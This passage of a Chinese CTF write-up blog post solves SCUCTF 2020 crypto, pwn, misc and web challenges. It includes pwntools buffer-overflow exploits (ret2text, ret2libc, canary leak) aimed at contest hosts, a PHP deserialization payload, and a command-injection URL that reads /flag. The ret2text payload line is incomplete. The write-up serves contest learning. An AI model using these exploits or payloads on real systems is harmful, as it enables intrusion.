c_list[i]</span><br><span class="line">result = x % m</span><br><span class="line">print(result)</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> (<span class="literal">True</span>):</span><br><span class="line">    f = <span class="number">1</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">100</span>):</span><br><span class="line">        <span class="keyword">if</span> result % prime_list[i] != c_list[i]:</span><br><span class="line">            f = <span class="number">0</span></span><br><span class="line">    <span class="keyword">if</span> f == <span class="number">1</span>:</span><br><span class="line">        print(<span class="string">&quot;flag is scuctf&#123;%d&#125;&quot;</span> % (result % <span class="number">1145141145141145141145141919810</span>))</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    result += <span class="number">1</span></span><br><span class="line"><span class="comment"># flag is scuctf&#123;234970795255267031279059393553&#125;</span></span><br></pre></td></tr></table></figure>


<hr>
<h3 id="6-RSA-3"><a href="#6-RSA-3" class="headerlink" title="6.RSA_3"></a>6.RSA_3</h3><p>本题与RSA_1一样,m=3,都是低加密指数攻击,使用脚本:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: cp936 -*-</span></span><br><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line">e = <span class="number">3</span></span><br><span class="line"><span class="comment"># 读入 n, 密文</span></span><br><span class="line">n= <span class="number">91271647735744709097708757371810693819959773890255602892321052899291140524662404139036987856738557165460502348870154514187118388083897953512262523467951513248663220055679646915049292032986252072883347567763269025940548912246834125522235064649335386094011441612211361270863086815851273615300955370973053395447</span></span><br><span class="line">c= <span class="number">8473924177689385097361186953656797062650227841190040965380473377780644233766714939608585534305414668494659709275756172697799483669925043356688884324887478394528746881611781366747757023562008158800275672858865552852268001893</span></span><br><span class="line"><span class="built_in">print</span> <span class="string">&#x27;n=&#x27;</span>, n</span><br><span class="line"><span class="built_in">print</span> <span class="string">&#x27;c=&#x27;</span>, c</span><br><span class="line"><span class="built_in">print</span> <span class="string">&#x27;[+]Detecting m...&#x27;</span></span><br><span class="line">result = gmpy2.iroot(c, <span class="number">3</span>)</span><br><span class="line"><span class="built_in">print</span> <span class="string">&#x27;  [-]The c has cubic root?&#x27;</span>, result[<span class="number">1</span>]</span><br><span class="line"><span class="keyword">if</span> result[<span class="number">1</span>]: <span class="built_in">print</span> <span class="string">&#x27;  [-]The m is:&#x27;</span>, <span class="string">&#x27;&#123;:x&#125;&#x27;</span>.<span class="built_in">format</span>(result[<span class="number">0</span>]).decode(<span class="string">&#x27;hex&#x27;</span>)</span><br><span class="line"><span class="built_in">print</span> <span class="string">&#x27;[!]All Done!&#x27;</span></span><br></pre></td></tr></table></figure>
<p>得到flag:</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/crypto/rsa3.png"></p>
<hr>
<h3 id="7-math-2"><a href="#7-math-2" class="headerlink" title="7.math_2"></a>7.math_2</h3><p>本题为求解二次剩余方程,谷歌后找到了一个脚本:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">求解二次剩余的根</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">generate_quadratic_field</span>(<span class="params">d, modulo=<span class="number">0</span></span>):</span></span><br><span class="line">    <span class="string">&quot;&quot;&quot;Generate quadratic field number class</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    Returns:</span></span><br><span class="line"><span class="string">        class -- quadratic field number class</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">assert</span> (<span class="built_in">isinstance</span>(modulo, <span class="built_in">int</span>) <span class="keyword">and</span> modulo &gt;= <span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">QuadraticFieldNumber</span>:</span></span><br><span class="line">        <span class="function"><span class="keyword">def</span> <span class="title">__init__</span>(<span class="params">self, x, y</span>):</span></span><br><span class="line">            self.x = x % modulo</span><br><span class="line">            self.y = y % modulo</span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">def</span> <span class="title">__mul__</span>(<span class="params">self, another</span>):</span></span><br><span class="line">            x = self.x * another.x + d * self.y * another.y</span><br><span class="line">            y = self.x * another.y + self.y * another.x</span><br><span class="line">            <span class="keyword">return</span> self.__class__(x, y)</span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">def</span> <span class="title">__pow__</span>(<span class="params">self, exponent</span>):</span></span><br><span class="line">            result = self.__class__(<span class="number">1</span>, <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">if</span> exponent:</span><br><span class="line">                temporary = self.__class__(self.x, self.y)</span><br><span class="line">                <span class="keyword">while</span> exponent:</span><br><span class="line">                    <span class="keyword">if</span> exponent &amp; <span class="number">1</span>:</span><br><span class="line">                        result *= temporary</span><br><span class="line">                    temporary *= temporary</span><br><span class="line">                    exponent &gt;&gt;= <span class="number">1</span></span><br><span class="line">            <span class="keyword">return</span> result</span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">def</span> <span class="title">__str__</span>(<span class="params">self</span>):</span></span><br><span class="line">            <span class="keyword">return</span> <span class="string">&#x27;(&#123;&#125;, &#123;&#125; \\sqrt(&#123;&#125;))&#x27;</span>.<span class="built_in">format</span>(self.x, self.y, d)</span><br><span class="line">    <span class="keyword">return</span> QuadraticFieldNumber</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">square_root_of_quadratic_residue</span>(<span class="params">n, modulo</span>):</span></span><br><span class="line">    <span class="string">&quot;&quot;&quot;Square root of quadratic residue</span></span><br><span class="line"><span class="string">    </span></span><br><span class="line"><span class="string">    Solve the square root of quadratic residue using Cipolla&#x27;s algorithm with Legendre symbol</span></span><br><span class="line"><span class="string">    Returns:</span></span><br><span class="line"><span class="string">        int -- if n is a quadratic residue,</span></span><br><span class="line"><span class="string">                   return x, such that x^&#123;2&#125; = n (mod modulo)</span></span><br><span class="line"><span class="string">               otherwise, return -1</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">if</span> modulo == <span class="number">2</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="number">1</span></span><br><span class="line">    <span class="keyword">if</span> n % modulo == <span class="number">0</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span></span><br><span class="line">    Legendre = <span class="keyword">lambda</span> n: <span class="built_in">pow</span>(n, modulo - <span class="number">1</span> &gt;&gt; <span class="number">1</span>, modulo)</span><br><span class="line">    <span class="keyword">if</span> Legendre(n) == modulo - <span class="number">1</span>:</span><br><span class="line">        <span class="keyword">return</span> -<span class="number">1</span></span><br><span class="line">    t = <span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span> Legendre(t ** <span class="number">2</span> - n) != modulo - <span class="number">1</span>:</span><br><span class="line">        t += <span class="number">1</span></span><br><span class="line">    w = (t ** <span class="number">2</span> - n) % modulo</span><br><span class="line">    <span class="keyword">return</span> (generate_quadratic_field(w, modulo)(t, <span class="number">1</span>) ** (modulo + <span class="number">1</span> &gt;&gt; <span class="number">1</span>)).x</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    result = square_root_of_quadratic_residue(<span class="number">11451419198101926081719260817111</span>,<span class="number">8497980875583539713991243773941802042180496489377326522174599746685528850719812035800799014030522052269804143947777659192760008656733593814889715667890907</span>)</span><br><span class="line">    print(result)</span><br><span class="line">    print(<span class="string">&quot;flag is scuctf&#123;%d&#125;&quot;</span> % (result % <span class="number">1145141145141145141145141919810</span>))</span><br><span class="line"><span class="comment"># 732801025780658791900010899303199208933111943525875138490440727430546888153518985058336834409501987347490118623489611480915480075486097312160196897614257</span></span><br><span class="line"><span class="comment"># flag is scuctf&#123;362832854211699327118018596457&#125;</span></span><br></pre></td></tr></table></figure>

<hr>
<h3 id="8-baby-pad"><a href="#8-baby-pad" class="headerlink" title="8.baby_pad"></a>8.baby_pad</h3><p>观察pad方法和输出的密文,在pad函数在M后面加上了0x05个0x05,故先将cipher从十六进制字符串转转成字符串,然后使用切片切掉后5个字符得到M,再将M与key进行异或得到flag,编写脚本如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Util.strxor <span class="keyword">import</span> strxor</span><br><span class="line"></span><br><span class="line">flag = <span class="string">b&#x27;???&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pad</span>(<span class="params">M</span>):</span></span><br><span class="line">    pad_length = <span class="number">16</span> - <span class="built_in">len</span>(M) % <span class="number">16</span></span><br><span class="line">    <span class="keyword">return</span> M.decode() + <span class="built_in">chr</span>(pad_length) * pad_length</span><br><span class="line"></span><br><span class="line">key = <span class="string">b&#x27;x&#x27;</span> * <span class="built_in">len</span>(flag)</span><br><span class="line">print(<span class="built_in">len</span>(flag))</span><br><span class="line">cipher = pad(strxor(flag, key))</span><br><span class="line">print(cipher.encode().<span class="built_in">hex</span>())</span><br><span class="line"><span class="comment"># cipher = 0b1b0d1b0c1e031d190b01270c0a111b13131313050505050505050505050505</span></span><br><span class="line"></span><br><span class="line">res = <span class="string">&#x27;0b1b0d1b0c1e031d190b01270c0a111b13131313050505050505050505050505&#x27;</span></span><br><span class="line">s = <span class="built_in">bytes</span>.fromhex(res).decode()</span><br><span class="line">print(<span class="built_in">len</span>(s))</span><br><span class="line">t = s[:-<span class="number">5</span>].encode()</span><br><span class="line">key1 = <span class="string">b&#x27;x&#x27;</span>*<span class="built_in">len</span>(t)</span><br><span class="line">print(strxor(t,key1))</span><br><span class="line"><span class="comment"># b&#x27;scuctf&#123;easy_trickkkk&#125;&#125;&#125;&#125;&#125;&#125;&#125;&#x27;</span></span><br></pre></td></tr></table></figure>


<hr>
<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><h3 id="1-nc"><a href="#1-nc" class="headerlink" title="1.nc"></a>1.nc</h3><p>在linux终端 nc 121.196.34.30 10004</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/pwn/nc.png"></p>
<hr>
<h3 id="2-ret2text"><a href="#2-ret2text" class="headerlink" title="2.ret2text"></a>2.ret2text</h3><p>查看关键函数,可见s申请的空间为0x10:</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/pwn/pwn2.2.png"></p>
<p>gdb调试查看偏移量,所以偏移量就是0x10:</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/pwn/pwn2.4.png"></p>
<p>找到后门函数success的地址:</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/pwn/pwn2.3.png"></p>
<p>编写exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment"># p = process(&#x27;./ret2text&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;121.196.34.30&#x27;</span>,<span class="string">&#x27;10007&#x27;</span>)</span><br><span class="line">back_door = <span class="number">0x04007A5</span></span><br><span class="line">payload = <span class="string">&#x27;A&#x27;</span> * <span class="number">0x10</span> + p64(<span class="number">0</span>) + p64</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="raw"><a href="#raw" class="headerlink" title="raw"></a>raw</h2><h3 id="3-ret2libc"><a href="#3-ret2libc" class="headerlink" title="3.ret2libc"></a>3.ret2libc</h3><p>先查看保护情况:</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/pwn/pwn3.1.png"></p>
<p>查看偏移量,故偏移量为buf申请的空间加上rbp的8个字节:0x70+0x08=120</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/pwn/pwn3.2.png"></p>
<p>因为是64位的程序,使用寄存器传递参数,通过pop指令来向寄存器中传值,查找rdi的地址</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/pwn/pwn3.3.png"></p>
<p>查看bin/sh的地址</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/pwn/pwn3.4.png"></p>
<p>查看system函数的地址</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/pwn/pwn3.5.png"></p>
<p>编写exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context.log_level = &#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line">sh = remote(<span class="string">&#x27;121.196.34.30&#x27;</span>,<span class="string">&#x27;10005&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pwn</span>(<span class="params">sh, payload</span>):</span></span><br><span class="line">	sh.send(payload)</span><br><span class="line">	sh.interactive()</span><br><span class="line">    </span><br><span class="line">system_addr = <span class="number">0x04006D0</span></span><br><span class="line">pop_rdi_addr = <span class="number">0x04009f3</span></span><br><span class="line">binsh_addr = <span class="number">0x0400A14</span> </span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>* <span class="number">120</span> + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr)</span><br><span class="line">pwn(sh, payload) </span><br></pre></td></tr></table></figure>


<hr>
<h3 id="5-baby-canary"><a href="#5-baby-canary" class="headerlink" title="5.baby_canary"></a>5.baby_canary</h3><p>查看保护情况</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/pwn/pwn4.1.png"></p>
<p>可以知道v6就是canary,计算buf到v6的偏移量为0x28-0x18=24,还要覆盖rbp的0x08个字节</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/pwn/pwn4.2.png"></p>
<p>编写exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">path = <span class="string">&quot;/home/icey/canarys/canary&quot;</span></span><br><span class="line"></span><br><span class="line">io = remote(<span class="string">&#x27;121.196.34.30&#x27;</span>,<span class="string">&#x27;10000&#x27;</span>)</span><br><span class="line">get_shell = ELF(path).sym[<span class="string">&quot;success&quot;</span>]</span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">&quot;length?\n&quot;</span>)</span><br><span class="line">io.sendline(<span class="string">&quot;32&quot;</span>) <span class="comment"># 发送32(大于24小于32)通过验证,并可以使返回数据时不发生EOF异常</span></span><br><span class="line">io.recvuntil(<span class="string">&quot;what?\n&quot;</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">24</span></span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.recvuntil(<span class="string">&#x27;a&#x27;</span>*<span class="number">24</span>)</span><br><span class="line"></span><br><span class="line">Canary = u64(io.recv(<span class="number">8</span>)) -<span class="number">0xa</span></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">24</span>+p64(Canary)+<span class="string">&#x27;a&#x27;</span>*<span class="number">8</span>+p64(get_shell)</span><br><span class="line"></span><br><span class="line">io.send(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>


<hr>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="1-easy-encode"><a href="#1-easy-encode" class="headerlink" title="1.easy_encode"></a>1.easy_encode</h3><p>仅有scu、401两种组成编码,猜测是摩斯密码 写程序输出摩斯密码格式:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">f = <span class="built_in">open</span>(<span class="string">&#x27;flag.txt&#x27;</span>) </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">13</span>): </span><br><span class="line">s = f.readline() </span><br><span class="line">s = s.replace(<span class="string">&#x27;401&#x27;</span>, <span class="string">&#x27;.&#x27;</span>) <span class="comment"># long </span></span><br><span class="line">s = s.replace(<span class="string">&#x27;SCU&#x27;</span>, <span class="string">&#x27;_&#x27;</span>) <span class="comment"># short </span></span><br><span class="line">s = s.replace(<span class="string">&#x27; &#x27;</span>, <span class="string">&#x27;/&#x27;</span>) </span><br><span class="line">s = s.replace(<span class="string">&#x27;#&#x27;</span>, <span class="string">&#x27;&#x27;</span>) </span><br><span class="line"><span class="built_in">print</span> s[:-<span class="number">1</span>]</span><br></pre></td></tr></table></figure>
<p>在线网站解密得到flag</p>
<hr>
<h3 id="2-excalibur"><a href="#2-excalibur" class="headerlink" title="2.excalibur"></a>2.excalibur</h3><p>java反编译,得到flag</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/misc/misc2.png"></p>
<hr>
<h3 id="3-签到题"><a href="#3-签到题" class="headerlink" title="3.签到题"></a>3.签到题</h3><hr>
<h3 id="4-问卷"><a href="#4-问卷" class="headerlink" title="4.问卷"></a>4.问卷</h3><hr>
<h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><hr>
<h3 id="1-真的是签到题"><a href="#1-真的是签到题" class="headerlink" title="1.真的是签到题"></a>1.真的是签到题</h3><p>保存图片就有flag</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/WEB/%E4%B8%8B%E8%BD%BD.png"></p>
<hr>
<h3 id="2-情感日记"><a href="#2-情感日记" class="headerlink" title="2.情感日记"></a>2.情感日记</h3><p>一张张看,拼出flag</p>
<hr>
<h3 id="3-新生系列1-easyhtml"><a href="#3-新生系列1-easyhtml" class="headerlink" title="3.(新生系列1)easyhtml"></a>3.(新生系列1)easyhtml</h3><p>F12查看源代码,注释处就有flag</p>
<hr>
<h3 id="4-我爬我爬"><a href="#4-我爬我爬" class="headerlink" title="4.我爬我爬"></a>4.我爬我爬</h3><p>地址栏输入robots.txt跳转<br>发现ffflllaaaggg.html,输入后再跳转,base64解密得到flag</p>
<hr>
<h3 id="5-easyheehee"><a href="#5-easyheehee" class="headerlink" title="5.easyheehee"></a>5.easyheehee</h3><p>查看响应头,lookme=Wm1abWJHeHNZV0ZoWjJkbkxuQm9jQT09<br>两次base64解码得到ffflllggg.php,在地址栏访问即可获得flag</p>
<hr>
<h3 id="6-easyweb"><a href="#6-easyweb" class="headerlink" title="6.easyweb"></a>6.easyweb</h3><p>Burp抓包添加:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">GET &#x2F; HTTP&#x2F;1.1</span><br><span class="line">Host: 121.89.162.165:8006</span><br><span class="line">User-Agent: 0x401Browser</span><br><span class="line">Accept: text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,image&#x2F;webp,*&#x2F;*;q&#x3D;0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q&#x3D;0.8,zh-TW;q&#x3D;0.7,zh-HK;q&#x3D;0.5,en-US;q&#x3D;0.3,en;q&#x3D;0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Connection: close</span><br><span class="line">Cookie: Hm_lvt_a7727c1058f4f3bf30026a96a53ff1e9&#x3D;1605940928</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">X-Forwarded-For: 127.0.0.1</span><br><span class="line">referer: http:&#x2F;&#x2F;scuctf.com</span><br><span class="line">Via: hgg.com</span><br><span class="line">Content-Length: 2</span><br></pre></td></tr></table></figure>
<p>得到</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">scuctf&#123;i_am_a_powerful_hacker&#125;</span><br></pre></td></tr></table></figure>


<hr>
<h3 id="7-看我后面"><a href="#7-看我后面" class="headerlink" title="7.看我后面"></a>7.看我后面</h3><p>后续加index.php.bak得到源码,弱比较,传入5201314得到flag</p>
<hr>
<h3 id="8-normalPHP"><a href="#8-normalPHP" class="headerlink" title="8.normalPHP"></a>8.normalPHP</h3><p>读Php代码<br>经测试,base64被过滤,用base32<br><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/WEB/123.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">得到flag$flag &#x3D; &quot;scuctf&#123;php_is_very_1111asy&#125;&quot;</span><br></pre></td></tr></table></figure>


<hr>
<h3 id="9-渣男记录"><a href="#9-渣男记录" class="headerlink" title="9.渣男记录"></a>9.渣男记录</h3><p>查找文件备份<a target="_blank" rel="noopener" href="http://www.zip得到源码,select做参数,反序列化/">www.zip得到源码,select做参数,反序列化</a><br>wakeup修改username  手动设置参数大于实际参数就可以绕过wakeup<br>select=O:4:”Love”:3:{s:8:”username”;s:5:”admin”;s:8:”password”;i:520;</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">scuctf&#123;sadsa541-azhanana-2xzsdz&#125;</span><br></pre></td></tr></table></figure>
<p><a target="_blank" rel="noopener" href="http://121.89.162.165:8987/?select=O:4:%22Love%22:3:%7Bs:8:%22username%22;s:5:%22admin%22;s:8:%22password%22;s:3:%22520%22;%7D">http://121.89.162.165:8987/?select=O:4:%22Love%22:3:{s:8:%22username%22;s:5:%22admin%22;s:8:%22password%22;s:3:%22520%22;}</a></p>
<hr>
<h3 id="10-有手就行"><a href="#10-有手就行" class="headerlink" title="10.有手就行"></a>10.有手就行</h3><p><a target="_blank" rel="noopener" href="http://47.94.226.249:8888/?ctf=sh%20/flag%202%3E&1">http://47.94.226.249:8888/?ctf=sh%20/flag%202%3E%261</a></p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">1c3y</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://example.com/2020/11/29/WriteUp/">http://example.com/2020/11/29/WriteUp/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://example.com" target="_blank">Icey's Blog</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"></div><div class="post_share"><div class="social-share" data-image="https://i.loli.net/2021/03/21/OVXUobe5qvlNM4G.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-full"><a href="/2021/01/25/get_started_3dsctf_2016/"><img class="prev-cover" src="https://i.loli.net/2021/03/21/FpLYGZ5oVaXI4s9.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">get_started_3dsctf_2016</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="card-info-avatar is-center"><img class="avatar-img" src="http://p.ananas.chaoxing.com/star3/origin/e79248a96a8b9a9f4c51e2e7beaabc5c.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/><div class="author-info__name">1c3y</div><div class="author-info__description">Welcome</div></div><div class="card-info-data"><div class="card-info-data-item is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">7</div></a></div><div class="card-info-data-item is-center"><a href="/tags/"><div class="headline">标签</div><div class="length-num">3</div></a></div><div class="card-info-data-item is-center"><a href="/categories/"><div class="headline">分类</div><div class="length-num">2</div></a></div></div><a class="button--animated" id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn card-announcement-animation"></i><span>公告</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Reverse"><span class="toc-number">1.</span> <span class="toc-text">Reverse</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-easyF5"><span class="toc-number">1.1.</span> <span class="toc-text">1.easyF5</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-easypack"><span class="toc-number">1.2.</span> <span class="toc-text">2.easypack</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-pytrade"><span class="toc-number">1.3.</span> <span class="toc-text">3.pytrade</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-crackme"><span class="toc-number">1.4.</span> <span class="toc-text">4.crackme</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-maze"><span class="toc-number">1.5.</span> <span class="toc-text">5.maze</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-decryptme"><span class="toc-number">1.6.</span> <span class="toc-text">6.decryptme</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-pytrade-plus"><span class="toc-number">1.7.</span> <span class="toc-text">7.pytrade-plus</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CRYPTO"><span class="toc-number">2.</span> <span class="toc-text">CRYPTO</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-classic-1"><span class="toc-number">2.1.</span> <span class="toc-text">1.classic_1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-classic-2"><span class="toc-number">2.2.</span> <span class="toc-text">2.classic_2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" 